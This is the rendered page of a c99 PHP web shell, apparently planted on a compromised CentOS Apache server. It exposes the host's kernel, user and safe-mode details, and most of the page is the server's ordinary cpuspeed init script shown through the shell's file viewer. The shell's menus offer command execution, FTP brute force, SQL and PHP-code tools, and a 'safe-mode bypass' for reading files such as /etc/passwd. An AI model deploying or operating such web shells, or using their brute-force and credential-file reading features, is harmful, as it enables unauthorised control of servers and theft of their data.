!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/rc.d/rc6.d/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     K99cpuspeed (9.73 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/bin/sh # Startup script for cpuspeed # # chkconfig: 12345 13 99 # description: Run dynamic CPU speed daemon and/or load appropriate # cpu frequency scaling kernel modules and/or governors # Source function library. . /etc/rc.d/init.d/functions prog="cpuspeed" [ -f /usr/sbin/$prog ] || exit 5 # Get config. if [ -f /etc/sysconfig/$prog ]; then . /etc/sysconfig/$prog fi cpu0freqd=/sys/devices/system/cpu/cpu0/cpufreq cpus='/sys/devices/system/cpu/cpu[0-9]*' testpat="${cpus}/cpufreq/scaling_driver" lockfile="/var/lock/subsys/$prog" xendir="/proc/xen" logger="/usr/bin/logger -p info -t $prog" IGNORE_NICE=${IGNORE_NICE:-0} module_loaded=false some_file_exist() { while [ "$1" ] ; do [ -f "$1" ] && return 0 shift done return 1 } governor_is_module() { # Check to see if the requested cpufreq governor # is provided as a kernel module or not module_info=`/sbin/modinfo cpufreq-${governor} > /dev/null 2>&1` return $? } governor_module_loaded() { # Check to see if we have a module loaded for # the current cpufreq governor if [ -e ${cpu0freqd}/scaling_governor ]; then governor=`cat ${cpu0freqd}/scaling_governor` else governor="none" fi if [ "${governor}" != "none" -a `/sbin/lsmod | grep -c -w "cpufreq.${governor}"` -ge 1 ]; then return 0 fi return 1 } adjust_cpufreq() { # First arg is a param under $cpu/cpufreq/ # Second arg is the value you want to set that param to for cpu in ${cpus}; do echo $2 > $cpu/cpufreq/$1 done } start_cpuspeed() { echo -n $"Starting $prog: " # cpuspeed daemon thresholds are specified as idle percentages, # cpufreq modules as busy percentages, so we need to do some # math here for use of unified config... # DOWN_THRESHOLD doesn't mean exactly the same thing for # cpuspeed as it does for the cpufreq governors, but close # enough, and if not specified, we use same defaults as governors. if [ -n "$UP_THRESHOLD" ]; then let UP_THRESHOLD=100-$UP_THRESHOLD else UP_THRESHOLD=20 fi if [ -n "$DOWN_THRESHOLD" ]; then let DOWN_THRESHOLD=100-$DOWN_THRESHOLD else DOWN_THRESHOLD=80 fi OPTS="$OPTS -p $UP_THRESHOLD $DOWN_THRESHOLD" if [ -n "$MIN_SPEED" ]; then OPTS="$OPTS -m $MIN_SPEED" fi if [ -n "$MAX_SPEED" ]; then OPTS="$OPTS -M $MAX_SPEED" fi if [ "$IGNORE_NICE" -eq 0 ]; then OPTS="$OPTS -n" fi daemon $prog -d $OPTS RETVAL=$? return $RETVAL } stop_cpuspeed() { if [ -n "`pidof $prog`" ]; then echo -n $"Stopping $prog: " killproc $prog -USR1 killproc $prog -INT fi if [ -n "`pidof $prog`" ]; then killproc $prog fi RETVAL=$? return $RETVAL } start() { if [ $(id -u) -ne 0 ]; then echo -n "Insufficient privileges to start cpuspeed service: " failure; echo return 4 fi if [ ! -f $lockfile ]; then cpu_vendor=$(awk '/vendor_id/{print $3}' /proc/cpuinfo | tail -n 1) cpu_family=$(awk '/cpu family/{print $4}' /proc/cpuinfo | tail -n 1) cpu_model=$(awk '/model\t/{print $3}' /proc/cpuinfo | tail -n 1) cpu_stepping=$(awk '/stepping/{print $3}' /proc/cpuinfo | tail -n 1) # http://www.intel.com/Assets/PDF/specupdate/314554.pdf # # AL30 “A Machine Check Exception (MCE) Occurring during an Enhanced Intel # SpeedStep® Technology Ratio Change May Cause Both Processor Cores to Lock # Up”, so do not start cpuspeed if [ "$cpu_vendor" == GenuineIntel ] && [ "$cpu_family" -eq 15 ] \ && [ "$cpu_model" -eq 6 ] && [ "$cpu_stepping" -eq 8 ]; then $logger "Intel® Xeon® 7100 series CPU's errata will not allow cpuspeed to run." $logger "See errata AL30 in http://www.intel.com/Assets/PDF/specupdate/314554.pdf" echo -n "Frequency scaling disabled due to CPU bug (see syslog): " warning echo return 6 fi if ! some_file_exist $testpat ; then # Attempt to load scaling_driver if not loaded # but it is configured if [ -n "$DRIVER" ]; then /sbin/modprobe "$DRIVER" elif [ "$cpu_vendor" == AuthenticAMD ] && [ "$cpu_family" -ge 7 ]; then # Try loading powernow-k8 if this is an AMD processor, # family 7 or greater (Athlon XP/MP was family 6) pk8m=$(/sbin/modinfo powernow-k8 > /dev/null 2>&1) if [ "$?" -eq 0 ]; then /sbin/modprobe powernow-k8 2> /dev/null [ -d ${cpu0freqd} ] || /sbin/modprobe -r powernow-k8 2> /dev/null fi elif [ -d /proc/acpi ]; then # try ACPI /sbin/modprobe acpi-cpufreq 2> /dev/null # last resort, try speedstep-centrino, if its modular if [ ! -d ${cpu0freqd} ]; then /sbin/modprobe -r acpi-cpufreq 2> /dev/null cm=$(/sbin/modinfo speedstep-centrino > /dev/null 2>&1) if [ "$?" -eq 0 ]; then /sbin/modprobe speedstep-centrino 2> /dev/null [ -d ${cpu0freqd} ] || /sbin/modprobe -r speedstep-centrino 2> /dev/null fi fi elif [ $(grep -c "$flags.* est" /proc/cpuinfo) -ge 1 ]; then # we might still have a shot with speedstep-centrino... cm=$(/sbin/modinfo speedstep-centrino > /dev/null 2>&1) if [ "$?" -eq 0 ]; then /sbin/modprobe speedstep-centrino 2> /dev/null [ -d ${cpu0freqd} ] || /sbin/modprobe -r speedstep-centrino 2> /dev/null fi else # No scaling. Just exit. return 6 fi fi # If we get this far with no driver, we must have no scaling. # We're doomed. [ ! -f ${cpu0freqd}/scaling_driver ] && return 6 # Okay, we have a driver, carry on... drv=`cat ${cpu0freqd}/scaling_driver` # Figure out default governor to use case "$drv" in centrino|powernow-k8|acpi-cpufreq|e_powersaver) default_governor=ondemand ;; p4-clockmod) # p4-clockmod's latency and lack of actual freq scaling ability # makes performance a much better default than ondemand here default_governor=performance ;; *) default_governor=userspace ;; esac # Frequency scaling on AMD rev F CPUs under Xen can result in # timekeeping problems for fully virtualized guests, so we disable # it by default. if [ -d "$xendir" ] && [ "$cpu_vendor" == AuthenticAMD ] \ && [ "$cpu_family" -le 15 ]; then default_governor=performance fi governor=${GOVERNOR:-${default_governor}} # Load governor module, if need be, and validate governor_is_module && /sbin/modprobe cpufreq-${governor} if [ `grep -c -w ${governor} ${cpu0freqd}/scaling_available_governors` -ge 1 ]; then $logger "Enabling ${governor} cpu frequency scaling governor" else $logger "Invalid governor \"${governor}\" specified, falling back to ${default_governor}" governor_is_module && /sbin/modprobe -r cpufreq-${governor} governor=${default_governor} governor_is_module && /sbin/modprobe cpufreq-${governor} fi # Set governor adjust_cpufreq scaling_governor ${governor} # Run cpuspeed daemon for userspace gov, kernel ones otherwise if [ "${governor}" == "userspace" ]; then if [ ! -d "$xendir" ]; then start_cpuspeed RETVAL=$? else $logger "The userspace CPU freq scaling governor does not support Xen" RETVAL=6 fi else if [ -n "$MIN_SPEED" ]; then adjust_cpufreq scaling_min_freq $MIN_SPEED fi if [ -n "$MAX_SPEED" ]; then adjust_cpufreq scaling_max_freq $MAX_SPEED fi if [ -n "$UP_THRESHOLD" -a ${governor} == "ondemand" ]; then adjust_cpufreq ondemand/up_threshold $UP_THRESHOLD fi if [ -n "$DOWN_THRESHOLD" -a ${governor} == "conservative" ]; then adjust_cpufreq conservative/down_threshold $DOWN_THRESHOLD fi if [ "$IGNORE_NICE" -eq 1 -a ${governor} == "ondemand" -o ${governor} == "conservative" ]; then adjust_cpufreq ${governor}/ignore_nice_load $IGNORE_NICE fi echo -n "Enabling ${governor} cpu frequency scaling: " success RETVAL=0 fi echo # Technically, not quite right in non-cpuspeed daemon # cases, but close enough to indicate that we're # doing some sort of cpu frequency scaling. [ $RETVAL = 0 ] && touch $lockfile else # cpuspeed is already started RETVAL=1 fi return $RETVAL } stop() { if [ $(id -u) -ne 0 ]; then echo -n "Insufficient privileges to stop cpuspeed service: " failure; echo return 4 fi [ ! -f ${cpu0freqd}/scaling_driver ] && return 0 drv=`cat ${cpu0freqd}/scaling_driver` governor_module_loaded && module_loaded=true if [ "${governor}" != "userspace" ]; then echo -n "Disabling ${governor} cpu frequency scaling: " $logger "Disabling ${governor} cpu frequency scaling governor" for cpu in ${cpus}; do echo userspace > $cpu/cpufreq/scaling_governor cat $cpu/cpufreq/cpuinfo_max_freq > $cpu/cpufreq/scaling_setspeed done if [ $module_loaded == true ]; then /sbin/modprobe -r cpufreq-${governor} fi success RETVAL=0 else stop_cpuspeed RETVAL=$? fi echo [ -n "$DRIVER" ] && /sbin/modprobe -r $DRIVER [ $RETVAL = 0 ] && RETVAL=$? [ $RETVAL = 0 ] && rm -f $lockfile return $RETVAL } case "$1" in start) start ;; stop) stop ;; status) governor_module_loaded && module_loaded=true if [ $module_loaded == true -o ${governor} == "performance" ]; then echo "Frequency scaling enabled using ${governor} governor" else status $prog RETVAL=$? fi ;; restart|reload|force-reload) stop start ;; condrestart|try-restart) governor_module_loaded && module_loaded=true if [ $module_loaded == true -o -n "`pidof $prog`" -o ${governor} == "performance" ]; then stop start fi ;; *) echo $"Usage: $0 {start|stop|restart|condrestart|status}" exit 2 ;; esac exit $RETVAL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--